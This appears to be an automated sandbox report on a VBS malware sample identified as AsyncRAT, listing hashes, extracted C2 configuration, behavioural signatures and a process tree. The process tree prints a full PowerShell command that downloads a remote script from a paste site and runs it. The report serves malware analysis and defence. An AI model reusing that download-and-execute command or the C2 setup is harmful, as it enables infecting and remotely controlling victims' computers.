Analysis

  • max time kernel
    127s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    15-04-2022 12:16

General

  • Target

    WorkScope Details.vbs

  • Size

    31KB

  • MD5

    0284695a0af70e045cf579e015ebbdf4

  • SHA1

    f0c20148cf96f0c81463e0224d80d4c67d7c1a04

  • SHA256

    78a742710aa79e0574a6faefecfaf851b64043889e75768f5de091cfc5a21dc0

  • SHA512

    6e54499711e1a0ee1ecd4679d7584027a424ba496d0bca868cc8e8d13d47097c4f0d65c0e4277c1457371b37e0c525a8ade33860cabd4e8869a438282af89e56

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://textbin.net/raw/mevlbkxshp

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

rick63.publicvm.com:5900

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Meta Stealer Stealer

    Meta Stealer steals passwords stored in browsers, written in C++.

  • suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT)

    suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT)

  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WorkScope Details.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2748
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient] $Client = New-Object System.Net.WebClient; [Byte[]] $DownloadedData = $Client.DownloadData('https://textbin.net/raw/mevlbkxshp'); [String] $ByteToString = [System.Text.UTF8Encoding]::UTF8.GetString($DownloadedData); [System.IO.File]::WriteAllText('C:\Users\Public\mevlbkxshp.PS1', $ByteToString, [System.Text.Encoding]::UTF8); Invoke-Expression 'PowerShell -ExecutionPolicy RemoteSigned -File C:\Users\Public\mevlbkxshp.PS1'
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3360
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\mevlbkxshp.PS1
        3⤵
        • Drops startup file
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1668
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y0kudd0k\y0kudd0k.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:804
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8923.tmp" "c:\Users\Admin\AppData\Local\Temp\y0kudd0k\CSC4FC5FF9075EC4108B0398759F6937AB3.TMP"
            5⤵
              PID:3276
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4548
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE210.tmp.bat""
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:220
              • C:\Windows\SysWOW64\timeout.exe
                timeout 3
                6⤵
                • Delays execution with timeout.exe
                PID:544

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      85df31411080f87203ed45b0dab4f336

      SHA1

      5bf5b44ce38fa21c305c1a375da9e6ad84f48892

      SHA256

      e15527444c709b53eca9bc57890b4f6340fce53de1b5b0302a547f18da5974e5

      SHA512

      963cf413d03add219bc832009f2ae5de426a4fae0633f02dfe90db4754f375e8bbe06d967bb6cbca59d1c41476126f1c78d2073adb5ba39ca420adafa3b0944c

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      a5c074e56305e761d7cbc42993300e1c

      SHA1

      39b2e23ba5c56b4f332b3607df056d8df23555bf

      SHA256

      e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953

      SHA512

      c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

    • C:\Users\Admin\AppData\Local\Temp\RES8923.tmp

      Filesize

      1KB

      MD5

      9322b95f07b7e1e271c2fa8874a5f20c

      SHA1

      612c8d9ac50efe4e8d76ac5b5f47811703277975

      SHA256

      fd2c5952ffa58b90417151f7bc0cd9f1c3e25201f07c36a093dcd3ebbae835ba

      SHA512

      0833462403820790f163d88961930ec54a997cd470ae39f7cc6c6829579b83ebd7b86360a4db9a07e0997075375bd67d0a15890b0e0a59d3e9ed86db3ae30b6f

    • C:\Users\Admin\AppData\Local\Temp\tmpE210.tmp.bat

      Filesize

      171B

      MD5

      cdd92e0efb357b3e483b7b5aaeda5639

      SHA1

      d8eedc466f9a8e87d1b02ea01f93bd36c45fd27d

      SHA256

      f490959c2d53c1a690890eb7c33a5749bfb71144f95e6fc5e151061be9a1f3f8

      SHA512

      76b05516a5ebd9b14d63b4c69171f6022f795df690d9e64914ecbb4f82d369c0aae1ce085792af72948bb9bcee7f6eab8b8b61f593706fd341d0c69ccac5636e

    • C:\Users\Admin\AppData\Local\Temp\y0kudd0k\y0kudd0k.dll

      Filesize

      11KB

      MD5

      e77a052b93a30c4998702632cfdbaec7

      SHA1

      aa5191f5285e831b26a462027e0ae6b7cf38f098

      SHA256

      314754b99df20170e81f913348a42b43c8a18ef717be0415e6734836f25041f8

      SHA512

      41e9d116d5a1fa75ed4bcc064fc674cf519009821dbfc3cf1cda640861b3acfb2d3a4e022a0bf58efae2b7dd362065bed9d6764fbd8f89fd304af0304e0814db

    • C:\Users\Public\mevlbkxshp.PS1

      Filesize

      119KB

      MD5

      295c2976c1c116f86593c92dc671862f

      SHA1

      f99d1953227b7d6ba569af28463bef765966eec3

      SHA256

      5034918a1e8e29df87b61c95a05f1a3bf623a7b5f3b040076bacc448b0ee796d

      SHA512

      9e179e68c4836b0c8d91157b71d0ca97ac3b787e71b5e4d7c84327aeb95ea5ea0599eb96be0630922e6cfaa33a2142615d4f1aa5dd7c8c8d9f663538c95cb15f

    • \??\c:\Users\Admin\AppData\Local\Temp\y0kudd0k\CSC4FC5FF9075EC4108B0398759F6937AB3.TMP

      Filesize

      652B

      MD5

      3385d2e703ca3664a07c88f8b0fecdef

      SHA1

      4d4af9a126aeed0f7483f1c859ae8906397b20f2

      SHA256

      b1e9cb3a2ea5d7936927ad1e09f3069a50ed269bbefa12c0870480e8f4fb0a25

      SHA512

      8459da4b43bd67a44a7febf7999b5d15dcf1430fc8fb96426ad953375ae92ef08281f0f03723cbc137a1029416c6be1c9c2d4a743cf8cdd28864f2aa8d3a303d

    • \??\c:\Users\Admin\AppData\Local\Temp\y0kudd0k\y0kudd0k.0.cs

      Filesize

      14KB

      MD5

      5b28648a4e188b0ebdf2d5edcda61624

      SHA1

      faf0ba6c2ef8d8184881eda8a276796449969e1c

      SHA256

      e92acafc5a9dd128b120809aaf76178275c3d22b13fb7cc2f0d9c624befed1b1

      SHA512

      972fca6205f8927363b751ff51c6cf07c3b42f7cbd8fbe12c1098df539118ecf3d3ce1af3b5d376c8710ed183786fc911279ff81941aba4202a11ca5670b9937

    • \??\c:\Users\Admin\AppData\Local\Temp\y0kudd0k\y0kudd0k.cmdline

      Filesize

      327B

      MD5

      1c015fc25c1822842e0f90115b0481a4

      SHA1

      7454885012a06b7adcc3fcbdd3575c7e44d0a52e

      SHA256

      0586138145806ce5fb70898a1496bf8ce90dca81b118a28a6583c1b3db612ac6

      SHA512

      0a93ebd7c7d7830f7969caf03ae9aed15be51a139bcb2624e7e1be5f634dc419fa3b0d2ed9be20a21456ea2cad7c0c192a8fb4d88e9ad36db756790eac70e059

    • memory/1668-138-0x000001E2A3580000-0x000001E2A35F6000-memory.dmp

      Filesize

      472KB

    • memory/1668-139-0x000001E2A3B30000-0x000001E2A4058000-memory.dmp

      Filesize

      5.2MB

    • memory/1668-140-0x00007FFEA86B0000-0x00007FFEA9171000-memory.dmp

      Filesize

      10.8MB

    • memory/1668-141-0x000001E2A26C0000-0x000001E2A26C2000-memory.dmp

      Filesize

      8KB

    • memory/1668-142-0x000001E2A26C3000-0x000001E2A26C5000-memory.dmp

      Filesize

      8KB

    • memory/1668-143-0x000001E2A26C6000-0x000001E2A26C8000-memory.dmp

      Filesize

      8KB

    • memory/3360-134-0x0000027571DA0000-0x0000027571DA2000-memory.dmp

      Filesize

      8KB

    • memory/3360-133-0x0000027571DA6000-0x0000027571DA8000-memory.dmp

      Filesize

      8KB

    • memory/3360-132-0x00007FFEA86B0000-0x00007FFEA9171000-memory.dmp

      Filesize

      10.8MB

    • memory/3360-135-0x0000027571DA3000-0x0000027571DA5000-memory.dmp

      Filesize

      8KB

    • memory/3360-131-0x0000027571E20000-0x0000027571E42000-memory.dmp

      Filesize

      136KB

    • memory/4548-151-0x0000000000400000-0x0000000000412000-memory.dmp

      Filesize

      72KB

    • memory/4548-155-0x00000000057F0000-0x000000000588C000-memory.dmp

      Filesize

      624KB

    • memory/4548-156-0x0000000005E40000-0x00000000063E4000-memory.dmp

      Filesize

      5.6MB

    • memory/4548-157-0x0000000005900000-0x0000000005966000-memory.dmp

      Filesize

      408KB

    • memory/4548-158-0x00000000069B0000-0x0000000006A26000-memory.dmp

      Filesize

      472KB

    • memory/4548-159-0x0000000006A50000-0x0000000006A6E000-memory.dmp

      Filesize

      120KB